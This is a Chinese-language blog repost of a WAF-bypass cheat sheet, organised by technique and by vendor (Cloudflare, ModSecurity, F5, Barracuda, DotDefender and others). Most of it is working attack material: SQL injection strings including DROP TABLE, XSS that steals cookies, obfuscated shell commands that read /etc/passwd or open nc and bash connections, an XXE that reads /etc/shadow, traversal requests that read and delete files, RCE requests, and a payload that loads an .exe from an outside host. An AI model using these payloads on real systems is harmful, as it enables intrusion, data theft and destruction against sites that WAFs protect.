當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

干货|各种WAF绕过手法学习

發布時間：2024/1/23 编程问答 28 豆豆

生活随笔收集整理的這篇文章主要介紹了干货|各种WAF绕过手法学习小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

0X00????Fuzz/爆破

fuzz字典

1.Seclists/Fuzzing

https://github.com/danielmiessler/SecLists/tree/master/Fuzzing

2.Fuzz-DB/Attack

https://github.com/fuzzdb-project/fuzzdb/tree/master/attack

3.Other Payloads 可能會被ban ip，小心為妙。

https://github.com/foospidy/payloads

0X01????正則繞過

多少waf 使用正則匹配。

黑名單檢測/bypass

Case: SQL 注入

? Step 1:

過濾關鍵詞: and, or, union 可能正則: preg_match('/(and|or|union)/i', $id) 被攔截的語句: union select user, password from usersbypass語句: 1 || (select user from users where user_id=1) = 'admin'

? Step 2:

過濾關鍵詞: and, or, union, where 被攔截的語句: 1 || (select user from users where user_id = 1) = 'admin'bypass語句: 1 || (select user from users limit 1) = 'admin'

? Step 3:

過濾關鍵詞: and, or, union, where, limit 被攔截的語句: 1 || (select user from users limit 1) = 'admin'bypass語句: 1 || (select user from users group by user_id having user_id=1) = 'admin'

? Step 4:

過濾關鍵詞: and, or, union, where, limit, group by 被攔截的語句: 1 || (select user from users group by user_id having user_id = 1) = 'admin'bypass語句: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1

? Step 5:

過濾關鍵詞: and, or, union, where, limit, group by, select被攔截的語句: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1bypass語句: 1 || 1 = 1 into outfile 'result.txt' bypass語句: 1 || substr(user,1,1) = 'a'

? Step 6:

過濾關鍵詞: and, or, union, where, limit, group by, select, ' 被攔截的語句: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1bypass語句: 1 || user_id is not null bypass語句: 1 || substr(user,1,1) = 0x61 bypass語句: 1 || substr(user,1,1) = unhex(61)

? Step 7:

過濾關鍵詞: and, or, union, where, limit, group by, select, ', hex 被攔截的語句: 1 || substr(user,1,1) = unhex(61)bypass語句: 1 || substr(user,1,1) = lower(conv(11,10,36))

? Step 8:

過濾關鍵詞: and, or, union, where, limit, group by, select, ', hex, substr 被攔截的語句: 1 || substr(user,1,1) = lower(conv(11,10,36))bypass語句: 1 || lpad(user,7,1)

? Step 9:

過濾關鍵詞: and, or, union, where, limit, group by, select, ', hex, substr, white space 被攔截的語句: 1 || lpad(user,7,1)bypass語句: 1%0b || %0blpad(user,7,1)

0X02????????混淆/編碼

1. 大小寫

標準: <script>alert()</script> Bypassed: <ScRipT>alert()</sCRipT>標準: SELECT * FROM all_tables WHERE OWNER='DATABASE_NAME' Bypassed: sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'

2. URL 編碼

被阻斷語句: <svG/x=">"/oNloaD=confirm()// Bypassed: %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F被阻斷語句: uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12) Bypassed: uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29

3. Unicode 編碼

標準: <marquee onstart=prompt()> 混淆: <marquee onstart=\u0070r\u06f\u006dpt()>被阻斷語句: /?redir=http://google.com Bypassed: /?redir=http://google.com(Unicode 替代)被阻斷語句: <marquee loop=1 onfinish=alert()>x Bypassed: ＜marquee loop＝1 onfinish＝alert︵1)>x (Unicode 替代)TIP: 查看這些說明 this and this reports on HackerOne. :)

4. HTML 實體編碼

標準: "><img src=x onerror=confirm()> Encoded: "><img src=x onerror=confirm()> (General form) Encoded: "><img src=x onerror=confirm()> (Numeric reference)

5. 混合編碼

Sometimes, WAF rules often tend to filter out a specific type of encoding.This type of filters can be bypassed by mixed encoding payloads.Tabs and newlines further add to obfuscation.

混淆:

7. 雙重URL編碼

這個需要服務端多次解析了url編碼標準: http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\ 混淆: http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\標準: <script>alert()</script> 混淆: %253Cscript%253Ealert()%253C%252Fscript%253E

8. 通配符使用

用于linux命令語句注入，通過shell通配符繞過標準: /bin/cat /etc/passwd 混淆: /???/??t /???/??ss?? Used chars: / ? t s標準: /bin/nc 127.0.0.1 1337 混淆: /???/n? 2130706433 1337 Used chars: / ? n [0-9]

9. 動態payload 生成

標準: <script>alert()</script> 混淆: <script>eval('al'+'er'+'t()')</script>標準: /bin/cat /etc/passwd 混淆: /bi'n'''/c''at' /e'tc'/pa''ss'wdBash allows path concatenation for execution.標準: <iframe/onload='this["src"]="javascript:alert()"';> 混淆: <iframe/onload='this["src"]="jav"+"as&Tab;cr"+"ipt:al"+"er"+"t()"';>

9. 垃圾字符

Normal payloads get filtered out easily. Adding some junk chars helps avoid detection (specific cases only). They often help in confusing regex based firewall標準: <script>alert()</script> 混淆: <script>+-+-1-+-+alert(1)</script>標準: <BODY onload=alert()> 混淆: <BODY onload!#$%$()*~+-_.,:;?@[/|\]^`=alert()> NOTE: 上述語句可能會破壞正則的匹配，達到繞過。標準: <a href=javascript;alert()>ClickMe Bypassed: <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

10. 插入換行符

部分waf可能會對換行符沒有匹配標準: <iframe src=javascript:confirm(0)"> 混淆: <iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(0)">

11. 未定義變量

bash 和 perl 執行腳本中加入未定義變量，干擾正則。 TIP: 隨便寫個不存在的變量就好。$aaaa,$sdayuhjbsad,$dad2ed都可以。 Level 1 Obfuscation: Normal 標準: /bin/cat /etc/passwd 混淆: /bin/cat$u /etc/passwd$uLevel 2 Obfuscation: Postion Based 標準: /bin/cat /etc/passwd 混淆: $u/bin$u/cat$u $u/etc$u/passwd$uLevel 3 Obfuscation: Random characters 標準: /bin/cat /etc/passwd 混淆: $aaaaaa/bin$bbbbbb/cat$ccccccc $dddddd/etc$eeeeeee/passwd$fffffff一個精心制作的payload$sdijchkd/???$sdjhskdjh/??t$skdjfnskdj $sdofhsdhjs/???$osdihdhsdj/??ss??$skdjhsiudf

12. Tab 鍵和換行符

大多數waf匹配的是空格不是Tab標準: <IMG SRC="javascript:alert();"> Bypassed: <IMG SRC=" javascript:alert();"> 變形: <IMG SRC=" jav ascri pt:alert ();">標準: http://test.com/test?id=1 union select 1,2,3 標準: http://test.com/test?id=1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3標準: <iframe src=javascript:alert(1)></iframe> 混淆:<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>

13. Token Breakers(翻譯不了看起來說的就是sql注入閉合)

Attacks on tokenizers attempt to break the logic of splitting a request into tokens with the help of token breakers. Token breakers are symbols that allow affecting the correspondence between an element of a string and a certain token, and thus bypass search by signature. However, the request must still remain valid while using token-breakers. Case: Unknown Token for the TokenizerPayload: ?id=‘-sqlite_version() UNION SELECT password FROM users --Case: Unknown Context for the Parser (Notice the uncontexted bracket)Payload 1: ?id=123);DROP TABLE users --Payload 2: ?id=1337) INTO OUTFILE ‘xxx’ --

TIP:?更多payload可以看這里?cheat sheet.

14. 其他格式混淆

許多web應用程序支持不同的編碼類型(如下表)混淆成服務器可解析、waf不可解析的編碼類型

Case: IIS

IIS6, 7.5, 8 and 10 (ASPX v4.x) 允許 IBM037 字符可以發送編碼后的參數名和值

原始請求:

POST /sample.aspx?id1=something HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset=utf-8 Content-Length: 41id2='union all select * from users--

混淆請求+URL Encoding:

POST /sample.aspx?%89%84%F1=%A2%96%94%85%A3%88%89%95%87 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset=ibm037 Content-Length: 115%89%84%F2=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60

TIP:?可以使用?這個小腳本?來轉化編碼

import urllib.parse, sys from argparse import ArgumentParser lackofart = '''OBFUSCATOR '''def paramEncode(params="", charset="", encodeEqualSign=False, encodeAmpersand=False, urlDecodeInput=True, urlEncodeOutput=True):result = ""equalSign = "="ampersand = "&"if '=' and '&' in params:if encodeEqualSign:equalSign = equalSign.encode(charset)if encodeAmpersand:ampersand = ampersand.encode(charset)params_list = params.split("&")for param_pair in params_list:param, value = param_pair.split("=")if urlDecodeInput:param = urllib.parse.unquote(param)value = urllib.parse.unquote(value)param = param.encode(charset)value = value.encode(charset)if urlEncodeOutput:param = urllib.parse.quote_plus(param)value = urllib.parse.quote_plus(value)if result:result += ampersandresult += param + equalSign + valueelse:if urlDecodeInput:params = urllib.parse.unquote(params)result = params.encode(charset)if urlEncodeOutput:result = urllib.parse.quote_plus(result)return resultdef main():print(lackofart)parser = ArgumentParser('python3 obfu.py')parser._action_groups.pop()# A simple hack to have required arguments and optional arguments separatelyrequired = parser.add_argument_group('Required Arguments')optional = parser.add_argument_group('Optional Arguments')# Required Optionsrequired.add_argument('-s', '--str', help='String to obfuscate', dest='str')required.add_argument('-e', '--enc', help='Encoding type. eg: ibm037, utf16, etc', dest='enc')# Optional Arguments (main stuff and necessary)optional.add_argument('-ueo', help='URL Encode Output', dest='ueo', action='store_true')optional.add_argument('-udi', help='URL Decode Input', dest='udi', action='store_true')args = parser.parse_args()if not len(sys.argv) > 1:parser.print_help()quit()print('Input: %s' % (args.str))print('Output: %s' % (paramEncode(params=args.str, charset=args.enc, urlDecodeInput=args.udi, urlEncodeOutput=args.ueo)))if __name__ == '__main__':main() 服務器信息

可用編碼	說明
Nginx, uWSGI-Django-Python3	IBM037, IBM500, cp875, IBM1026, IBM273	對參數名和參數值進行編碼，服務器會對參數名和參數值均進行url解碼，需要對等號和& and進行編碼(不進行url編碼)
Nginx, uWSGI-Django-Python2	IBM037, IBM500, cp875, IBM1026, utf-16, utf-32, utf-32BE, IBM424	對參數名和參數值進行便慢慢服務器會對參數名和參數值均進行url解碼等號和&符號不應該以任何方式編碼。
Apache-TOMCAT8-JVM1.8-JSP	IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025	參數名按原始格式(可以像往常一樣使用url編碼)Body不論是否經過url編碼均可等號和&符號不應該以任何方式編碼
Apache-TOMCAT7-JVM1.6-JSP	IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025	參數名按原始格式(可以像往常一樣使用url編碼) Body 不論是否經過url編碼均可等號和&符號不應該以任何方式編碼
IIS6, 7.5, 8, 10 -ASPX (v4.x)	IBM037, IBM500, IBM870, cp875, IBM1026, IBM01047, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, unicodeFFFE, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420,IBM423, IBM424, x-EBCDIC-KoreanExtended, IBM-Thai, IBM871, IBM880, IBM905, IBM00924, cp1025	參數名按原始格式(可以像往常一樣使用url編碼) Body 不論是否經過url編碼均可等號和&符號不應該以任何方式編碼

0X04????????HTTP 參數污染

手法

這種攻擊方法基于服務器如何解釋具有相同名稱的參數可能造成bypass的情況: 服務器使用最后接收到的參數，WAF只檢查第一個參數服務器將來自類似參數的值聯合起來，WAF單獨檢查它們

下面是相關服務器對參數解釋的比較

環境參數解析示例

ASP/IIS	用逗號連接	par1=val1,val2
JSP, Servlet/Apache Tomcat	第一個參數是結果	par1=val1
ASP.NET/IIS	用逗號連接	par1=val1,val2
PHP/Zeus	最后一個參數是結果	par1=val2
PHP/Apache	最后一個參數是結果	par1=val2
JSP, Servlet/Jetty	第一個參數是結果	par1=val1
IBM Lotus Domino	第一個參數是結果	par1=val1
IBM HTTP Server	最后一個參數是結果	par1=val2
mod_perl, libapeq2/Apache	第一個參數是結果	par1=val1
Oracle Application Server 10G	第一個參數是結果	par1=val1
Perl CGI/Apache	第一個參數是結果	par1=val1
Python/Zope	第一個參數是結果	par1=val1
IceWarp	返回一個列表	[‘val1’,’val2’]
AXIS 2400	最后一個參數是結果	par1=val2
DBMan	由兩個波浪號連接起來	par1=val1~~val2
mod-wsgi (Python)/Apache	返回一個列表	ARRAY(0x8b9058c)

0X05????????瀏覽器的缺陷

Charset Bugs:

可以嘗試修改 charset header to 更高的 Unicode(eg. UTF-32) 當網站解碼的時候，觸發payload

Example request:

GET /page.php?p=???script?alert(1)?/script? HTTP/1.1 Host: site.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0 Accept-Charset:utf-32; q=0.5< Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate

當站點加載時，將其編碼為我們設置的UTF-32編碼，然后由于頁面的輸出編碼為UTF-8,將其呈現為: "<script>alert(1)</script>從而觸發xss。

完成url編碼后的payload:

%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80

Null 空字節

空字節通常用作字符串終止符

Payload 示例:<scri%00pt>alert(1);</scri%00pt> <scri\x00pt>alert(1);</scri%00pt> <s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t> 標準: <a href="javascript:alert()"> 混淆: <a href="ja0x09vas0x0A0x0Dcript:alert(1)">clickme</a> 變形: <a 0x00 href="javascript:alert(1)">clickme</a>

解析錯誤

RFC 聲明節點名不可以由空白起始但是我們可以使用特殊字符 ` %, //, !, ?`, etc.例子:<// style=x:expression\28write(1)\29> - Works upto IE7 (Source) - Works upto IE9 (Reference)<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/> - Works in IE7 (Reference)<%div%20style=xss:expression(prompt(1))> - Works Upto IE7

Unicode 分隔符

每個瀏覽器有不同的分隔分隔符

@Masato Kinugawafuzz 后發現如下

IExplorer: 0x09, 0x0B, 0x0C, 0x20, 0x3BChrome: 0x09, 0x20, 0x28, 0x2C, 0x3BSafari: 0x2C, 0x3BFireFox: 0x09, 0x20, 0x28, 0x2C, 0x3BOpera: 0x09, 0x20, 0x2C, 0x3BAndroid: 0x09, 0x20, 0x28, 0x2C, 0x3B

示例

<a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>pwn3d

使用其他非典型等效語法結構替換

找的"waf開發人員沒有注意到的"語句進行攻擊

一些WAF開發人員忽略的常見關鍵字:

JavaScript functions:
- window
- parent
- this
- self
Tag attributes:
- onwheel
- ontoggle
- onfilterchange
- onbeforescriptexecute
- ondragstart
- onauxclick
- onpointerover
- srcdoc

SQL Operators

lpad

lpad(string, padded_length, [ pad_string ] ) lpad函數從左邊對字符串使用指定的字符進行填充 lpad('tech', 7); 將返回' tech'lpad('tech', 2); 將返回'te'lpad('tech', 8, '0'); 將返回'0000tech'lpad('tech on the net', 15, 'z'); 將返回'tech on the net'lpad('tech on the net', 16, 'z'); 將返回'ztech on the net

field

FIELD(str,str1,str2,str3,...) 返回的索引（從1開始的位置）的str在str1，str2，STR3，...列表中。如果str沒有找到，則返回0。 +---------------------------------------------------------+ | FIELD('ej', 'Hej', 'ej', 'Heja', 'hej', 'foo') | +---------------------------------------------------------+ | 2 | +---------------------------------------------------------+

bit_count?二進制數中包含1的個數。BIT_COUNT(10);因為10轉成二進制是1010，所以該結果就是2

示例payloads:

Case: XSS <script>window['alert'](0)</script> <script>parent['alert'](1)</script> <script>self['alert'](2)</script> Case: SQLi SELECT if(LPAD(' ',4,version())='5.7', sleep(5),null); 1%0b||%0bLPAD(USER,7,1) 可以使用許多替代原生Javascript的方法: JSFuck JJEncode XChars.JS

濫用SSL/TLS密碼:

很多時候，服務器可以接收各種SSL/TLS密碼和版本的連接。初始化到waf不支持的版本找出waf支持的密碼(通常WAF供應商文檔對此進行了討論)。找出服務器支持的密碼(SSLScan這種工具可以幫助到你)。找出服務器支持但waf不支持的

Tool:?abuse-ssl-bypass-waf

濫用 DNS 記錄:

找到云waf后的源站

TIP:?一些在線資源?IP History?和?DNS Trails

Tool:?bypass-firewalls-by-DNS-history

bash bypass-firewalls-by-DNS-history.sh?-d?<target>?--checkall

請求頭欺騙

讓waf以為請求來自于內部網絡，進而不對其進行過濾。

添加如下請求頭

X-Originating-IP: 127.0.0.1 X-Forwarded-For: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-Remote-Addr: 127.0.0.1 X-Client-IP: 127.0.0.1

Google Dorks Approach:

應對已知WAF的繞過

搜索語法:

Normal search:

+<wafname> waf bypass

Searching for specific version exploits:
"<wafname> <version>" (bypass|exploit)

For specific type bypass exploits:
"<wafname>" +<bypass type> (bypass|exploit)

On?Exploit DB:
site:exploit-db.com +<wafname> bypass

On?0Day Inject0r DB:
site:0day.today +<wafname> <type> (bypass|exploit)

On?Twitter:
site:twitter.com +<wafname> bypass

On?Pastebin
site:pastebin.com +<wafname> bypass

0X06? ? 拓展Bypass姿勢

Airlock Ergon

SQLi Overlong UTF-8 Sequence Bypass (>= v4.2.4) by @Sec Consult%C0%80'+union+select+coll,col2,col3+from+table+--+

AWS

SQLi Bypass?by?@enkaskal

"; select * from TARGET_TABLE --

XSS Bypass?by?@kmkz

Barracuda

Cross Site Scripting by?@WAFNinja

<body style="height:1000px" onwheel="alert(1)"> <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)"> <b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>

HTML Injection by?@Global-Evolution

GET /cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_US Host: favoritewaf.com User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)

XSS Bypass by?@0xInfection

<a href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:open()>clickhere

Barracuda WAF 8.0.1 - Remote Command Execution (Metasploit) by @xort

Barracuda Spam & Virus Firewall 5.1.3 - Remote Command Execution (Metasploit)?by?@xort

Cerber (WordPress)

Username Enumeration Protection Bypass by HTTP Verb Tampering by?@ed0x21son

POST host.com HTTP/1.1 Host: favoritewaf.com User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)author=1

Protected Admin Scripts Bypass by?@ed0x21son

http://host/wp-admin///load-scripts.php?load%5B%5D=jquery-core,jquery-migrate,utils http://host/wp-admin///load-styles.php?load%5B%5D=dashicons,admin-bar

REST API Disable Bypass by?@ed0x21son

http://host/index.php/wp-json/wp/v2/users/

Citrix NetScaler

SQLi via HTTP Parameter Pollution (NS10.5) by?@BGA Security

<soapenv:Envelope?xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"?xmlns:tem="http://tempuri.org/"><soapenv:Header/><soapenv:Body><string>’ union select current_user,?2#</string></soapenv:Body> </soapenv:Envelope>

generic_api_call.pl?XSS?by?@NNPoster

http://host/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e

Cloudflare

HTML Injection?by?@spyerror

<div?style="background:url(/f#oo/;color:red/*/foo.jpg);">X

XSS Bypass?by?@c0d3g33k

<a+HREF='javascrip%26%239t:alert%26lpar;document.domain)'>test</a>

XSS Bypasses?by?@Bohdan Korzhynskyi

XSS Bypass?by?@RakeshMane10

XSS Bypass?by?@ArbazKiraak

<a?href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074(this['document']['cookie'])">X</a>`

XSS Bypass by?@Ahmet ümit

<--`<img/src=`?onerror=confirm``> --!>

XSS Bypass?by?@Shiva Krishna

javascript:{alert`0`}

XSS Bypass?by?@Brute Logic

<base?href=//knoxss.me?

XSS Bypass?by?@RenwaX23?(Chrome only)

<j?id=x?style="-webkit-user-modify:read-write"?onfocus={window.onerror=eval}throw/0/+name>H</j>#x

RCE Payload Detection Bypass?by?@theMiddle

cat$u+/etc$u/passwd$u /bin$u/bash$u?<ip> <port> ";cat+/etc/passwd+#

Comodo

XSS Bypass by?@0xInfection

<input/oninput='new Function`confir\u006d\`0\``'> <p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme

SQLi by?@WAFNinja

0 union/**/select?1,version(),@@datadir

DotDefender

Firewall disable by (v5.0) by?@hyp3rlinx

PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+ <enabled>false</enabled>

Remote Command Execution (v3.8-5) by?@John Dos

POST?/dotDefender/index.cgi?HTTP/1.1 Host: 172.16.159.132 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Authorization: Basic YWRtaW46 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 95sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al ../;pwd;&action=deletesite&linenum=15

Persistent XSS (v4.0) by?@EnableSecurity

GET /c?a=<script>?HTTP/1.1 Host: 172.16.159.132 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 <script>alert(1)</script>: aa Keep-Alive: 300

R-XSS Bypass by?@WAFNinja

XSS Bypass by?@0xInfection

<p?draggable=True?ondragstart=prompt()>alert <bleh/ondragstart=&Tab;parent&Tab;['open']&Tab;()%20draggable=True>dragme GET - XSS Bypass (v4.02) by @DavidK/search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source)%20/%3E<img?src="WTF"?onError="{var {3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v%2Ba%2Be%2Bs](e%2Bs%2Bv%2B h%2Bn)(/0wn3d/.source)"?/>

POST - XSS Bypass (v4.02) by?@DavidK

clave?XSS (v4.02) by?@DavidK

/?&idPais=3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{

Fortinet Fortiweb

pcre_expression?unvaidated XSS by?@Benjamin Mejri

/waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C /waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0

CSP Bypass by?@Binar10

POST Type Query

POST?/<path>/login-app.aspx?HTTP/1.1 Host: <host> User-Agent: <any valid user agent string> Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: <the content length must be at least 2399 bytes>var1=datavar1&var2=datavar12&pad=<random data to complete at least?2399?bytes>

GET Type Query

http://<domain>/path?var1=vardata1&var2=vardata2&pad=<large arbitrary data>

F5 ASM

XSS Bypass by?@WAFNinja

<table?background="javascript:alert(1)"></table> "/><marquee?onfinish=confirm(123)>a</marquee>

F5 BIG-IP

XSS Bypass by?@WAFNinja

<body?style="height:1000px"?onwheel="[DATA]"> <div?contextmenu="xss">Right-Click Here<menu?id="xss"?onshow="[DATA]"> <body?style="height:1000px"?onwheel="prom%25%32%33%25%32%36x70;t(1)"> <div?contextmenu="xss">Right-Click Here<menu?id="xss"?onshow="prom%25%32%33%25%32%36x70;t(1)">

XSS Bypass by?@Aatif Khan

<body style="height:1000px"?onwheel="prom%25%32%33%25%32%36x70;t(1)"> <div contextmenu="xss">Right-Click Here<menu?id="xss"onshow="prom%25%32%33%25%32%36x70;t(1)“>

report_type?XSS?by?@NNPoster

https://host/dms/policy/rep_request.php?report_type=%22%3E%3Cbody+onload=alert(%26quot%3BXSS%26quot%3B)%3E%3Cfoo+

POST Based XXE by?@Anonymous

POST?/sam/admin/vpe2/public/php/server.php?HTTP/1.1 Host: bigip Cookie: BIGIPAuthCookie=*VALID_COOKIE* Content-Length: 143<?xml version="1.0"?encoding='utf-8'??> <!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]> <message><dialogueType>&e;</dialogueType></message>

Directory Traversal by?@Anastasios Monachos

Read Arbitrary File

/tmui/Control/jspmap/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd

Delete Arbitrary File

POST?/tmui/Control/form?HTTP/1.1 Host: site.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: JSESSIONID=6C6BADBEFB32C36CDE7A59C416659494; f5advanceddisplay=""; BIGIPAuthCookie=89C1E3BDA86BDF9E0D64AB60417979CA1D9BE1D4; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd"; f5currenttab="main"; f5mainmenuopenlist=""; f5_refreshpage=/tmui/Control/jspmap/tmui/system/archive/properties.jsp%3Fname%3D../../../../../etc/passwd Content-Type: application/x-www-form-urlencoded_form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Farchive%2Fproperties&handler_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&showObjList=&showObjList_before=&hideObjList=&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue=icHjvahr354NZKtgQXl5yh2b&_bufvalue_before=icHjvahr354NZKtgQXl5yh2b&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Farchive%2Fproperties&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&linked_add_id=&linked_add_id_before=&name=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name_before=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&form_page=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&download_before=Download%3A+..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&restore_before=Restore&delete=Delete&delete_before=Delete

F5 FirePass

SQLi Bypass from?@Anonymous

state=%2527+and+ (case+when+SUBSTRING(LOAD_FILE(%2527/etc/passwd%2527),1,1)=char(114)+then+ BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+

ModSecurity

RCE Payloads Detection Bypass for PL3?by?@theMiddle?(v3.1)

;+$u+cat+/etc$u/passwd$u

RCE Payloads Detection Bypass for PL2?by?@theMiddle?(v3.1)

;+$u+cat+/etc$u/passwd+\#

RCE Payloads for PL1 and PL2?by?@theMiddle?(v3.0)

/???/??t+/???/??ss??

RCE Payloads for PL3?by?@theMiddle?(v3.0)

/?in/cat+/et?/passw?

SQLi Bypass?by?@Johannes Dahse?(v2.2)

0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user

SQLi Bypass?by?@Yuri Goltsev?(v2.2)

1 AND (select?DCount(last(username)&after=1&after=1)?from?users?where?username='ad1min')

SQLi Bypass?by?@Ahmad Maulana?(v2.2)

1'UNION/*!0SELECT user,2,3,4,5,6,7,8,9/*!0from/*!0mysql.user/*-

SQLi Bypass?by?@Travis Lee?(v2.2)

amUserId=1 union?select?username,password,3,4?from?users

SQLi Bypass?by?@Roberto Salgado?(v2.2)

%0Aselect%200x00,%200x41%20like/*!31337table_name*/,3%20from%20information_schema.tables%20limit%201

SQLi Bypass?by?@Georgi Geshev?(v2.2)

1%0bAND(SELECT%0b1%20FROM%20mysql.x)

SQLi Bypass?by?@SQLMap Devs?(v2.2)

%40%40new%20union%23sqlmapsqlmap...%0Aselect%201,2,database%23sqlmap%0A%28%29

SQLi Bypass?by?@HackPlayers?(v2.2)

